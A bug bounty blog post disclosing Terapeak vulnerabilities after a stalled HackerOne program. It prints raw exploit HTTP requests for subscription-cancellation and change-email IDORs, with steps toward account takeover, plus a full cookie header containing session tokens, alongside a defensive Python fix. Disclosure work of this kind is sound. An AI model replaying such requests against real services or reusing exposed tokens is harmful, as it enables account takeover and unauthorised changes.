All About HackerOne Private Program Terapeak

Hi folks!!

Here is a new blog post – all about the HackerOne private program Terapeak.

One day I got a private invitation from HackerOne and started digging into it, as I was trying to come back to bug bounty. I thought this was the right time to get some reputation. After spending some time I found some XSS, CSRF, IDORs, SQLi etc.

I reported all the issues on HackerOne and started waiting for the response. I did not have a good reputation at that time, and that was my only hope to get new invitations and start afresh in bug bounty.

Sadly, it wasn’t a good start, as my first IDOR was a duplicate, where one could execute JavaScript in anyone’s account, and the reward for that bug was $5000.

Finally 🙂 all bugs got triaged and I was like 😀

It was over five months and yet I was not getting any updates. Then I got some bounty from Terapeak for the XSS and for other smaller bugs, but the critical bugs like the IDORs, CSRF and SQLi were still only triaged and I was getting no reply.

After contacting HackerOne I got to know that they would get back soon, but nothing in my favour. Then I met Adam Bacchus at Nullcon India and shared everything with him. He assured me of his best and I was told that he would be updating me, but still there was no reply from Terapeak. There was no reply in spite of my repeated communication with Terapeak and Terapeak security members. Then a ray of hope arose when I got an update from Adam Bacchus that Terapeak was waiting for their sales manager, who would decide the budget for bounties, and I was to wait for at least two weeks. Months passed but nothing happened!

And then I started chatting with Jason Kabaker and he updated me that Terapeak was coming back and would start rewarding patient hackers only. To date there is no update on my HackerOne profile. I lost all hope and thought of writing a blog post about the situation. I asked the HackerOne team for approval, and as per the HackerOne disclosure guidelines, hackers can publicly disclose if the response time is over months.

I acknowledge all of the hard work you guys did at HackerOne to try and rectify the situation.

So here are some of the bugs which I’ve found:

Critical IDOR – Cancel any user’s subscription, edit subscription, add subscription

With this IDOR I was able to change or delete the subscription of any user.


PUT /svc/cancel_subscription HTTP/1.1
Host: www.terapeak.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Referer: https://sell.terapeak.com/?page=subscriptions
Content-Length: 160
Origin: https://sell.terapeak.com
Connection: close

{"email":"shubham**************@gmail.com","productName":"Terapeak+MySales Pro eBay","zuoraSubscriptionId":"2039653","mmiSubscriptionId":2039653,"mmiId":1257777}

So we just need to replace the email with a victim’s mail and we can remove the Terapeak MySales Pro subscription from his/her account. 2039653 is a subscription id, so we don’t need to change it.

Reflected XSS

I found XSS in the search box of Terapeak.

Go to http://www.terapeak.com/worth/search


IDOR in Change Email

I was testing the change email option and I found that to change your email you need to submit a request on https://support.terapeak.com/hc/en-us/requests/new?ticket_form_id=64245&contact=form

Fill in the form; the subject should be to change email. An attacker can send the following request and change a user’s email, as there is no verification.

POST /hc/en-us/requests HTTP/1.1
Host: support.terapeak.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://support.terapeak.com/hc/en-us/requests/new?ticket_form_id=64245&contact=form
Cookie: optimizelyEndUserId=oeu1476503787855r0.20443462719204775; optimizelySegments=%7B%22229813889%22%3A%22ff%22%2C%22229833781%22%3A%22referral%22%2C%22229852304%22%3A%22false%22%7D; optimizelyBuckets=%7B%223386134531%22%3A%223408741298%22%2C%227527391520%22%3A%227536641212%22%2C%226456040624%22%3A%226450293330%22%2C%225673570093%22%3A%225673580215%22%2C%227096310114%22%3A%227085320185%22%7D; __utma=195498537.885603089.1476503793.1479553234.1479567441.23; __utmz=195498537.1476503793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tp_ee_last_visit=1478889321; tp_ee_last_activity=1479058746; TERAPEAK_SESSID=t23qp3c6sqbmlgfjgrp1s3ho71; __tpa=1581941b032c10; tp_x8=69.0803835087417002-082f039pt%2FtjRC5DXUPHA4wudayrnWMIEpG8vsZYSBxk6gNKqoTF0mb7lfQJ1eO92ihV3zcL%3D; token=801037a4f46eda24abaeded7b6c4a2bca737cdbf73c33b982591e282d504f2b1; tokenExpiry=1510144207136; _ga=GA1.2.885603089.1476503793; localeHeader=en-US,en; i18next=en-US; userRole=PHOENIX_PROFESSIONAL; currency=USD; tpebayCurrencyId=1; __utmb=195498537.8.10.1479567441; __utmc=195498537; _zendesk_shared_session=-ZGhRQXNjcytPOGJmRnErQU5jaXlHeXNUckJDWnFwT1dTQ28rVjNGbEg2Mk5qWGRqNzZHWlZJS0RwQlRPWjVxSXZiNmhxREI3c2NIelhJRDNxS0UxRzVxcHMycnN5cmxiVlZOKzc0VkU1R0NtLzBuUGZJdjU3dFA4V2VhelI4cEIzTGYxUGhZY09wQVkrb0pvWWtJRWZFT1UzdkttWGRNaEpMN0xwQkZhUXNZPS0tQ1VRT1lhVnJKd2owRGYxVHI2aFR3dz09--c5e0e90c59f80a5e15a8dc4f6d84a95e2f70d0de; _help_center_session=WnhtUXNBSHNBczJHa0cvcmVMMzJ2TUdiTUk2clExRDQ2MU9LbGl1YTFFZUUrclBjWHVLZFl2Q2VNK3lhaUtZSjRsNWRDeEtVT2xYeFRqeVYrZG1ESmdnZHhsbWNlZ09HOGVsWnFGdEltTzkvOTNIeURGMjR0cGhWWU1mN1JJL1UxZmFIWFppQzlwNzBVRHE1ZURXN0swUFhMOTZPcURkN3ZjbjlFMHNjYkZHdldGS1RLOXBQSzRjM3AxR1pBYkphNVh6SkRYK2F6N1EraGJTQm9hUkd2allzd2h1eC84TDhweURRbmFUOG9nenNBQlZPNWNwWkdvdkFYb2VKV2Y5WS0taUFEbzlVelA2YTJhWWtVaEJXSklOZz09--68ea8978d02eaf0460db4868e0fd5cc292dd4daf
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 492

anonymous_requester_email%5D=shubham***********@gmail.com is vulnerable to the IDOR attack; the attacker only needs to change this email to the user’s email.

To verify this I did the same test on my account and Armaan Pathan’s account.


An attacker can basically mount an IDOR attack which would change the default email of the user, and this would lead to account takeover.
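Both the subscription IDOR and the change-email IDOR above share one root cause: the server trusts an email address supplied by the client instead of deriving the acting user from the session. The following is an added example (not Terapeak’s code) of how a defender would model the fixed handlers: the caller’s identity comes only from the session token, the request body may name a resource but never an identity, and an email change takes effect only after a single-use confirmation token sent to the new address is presented. All store contents, tokens and addresses are constructed sample data.

```python
import secrets
from dataclasses import dataclass, field

@dataclass
class Store:
    # Constructed sample data: one attacker session and one victim subscription.
    sessions: dict = field(default_factory=lambda: {"tok-attacker": "attacker@example.com"})
    subscriptions: dict = field(default_factory=lambda: {
        2039653: {"owner": "victim@example.com", "active": True}})
    pending: dict = field(default_factory=dict)  # confirm token -> (old email, new email)

def cancel_subscription_fixed(store, session_token, body):
    # Identity is taken from the session; the body may only name the resource.
    actor = store.sessions.get(session_token)
    if actor is None:
        return 401
    sub = store.subscriptions.get(body["mmiSubscriptionId"])
    if sub is None or sub["owner"] != actor:
        return 403  # a valid session naming someone else's id is an IDOR signal worth logging
    sub["active"] = False
    return 200

def _rename(store, old, new):
    # Apply the change everywhere the old address is used as the account key.
    for sub in store.subscriptions.values():
        if sub["owner"] == old:
            sub["owner"] = new
    for tok, email in list(store.sessions.items()):
        if email == old:
            store.sessions[tok] = new

def request_email_change_fixed(store, session_token, new_email):
    # Step 1: an authenticated caller asks; nothing changes until confirmed.
    actor = store.sessions.get(session_token)
    if actor is None:
        return 401, None
    token = secrets.token_urlsafe(32)
    store.pending[token] = (actor, new_email)
    # Returned here only so the demo can call step 2; in production the token
    # is mailed to new_email (proof of control) and never sent back to the caller.
    return 202, token

def confirm_email_change_fixed(store, token):
    # Step 2: the single-use token is spent on first use, so it cannot be replayed.
    entry = store.pending.pop(token, None)
    if entry is None:
        return 400
    _rename(store, *entry)
    return 200
```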

Thanks for reading; I want you guys to share this as much as possible.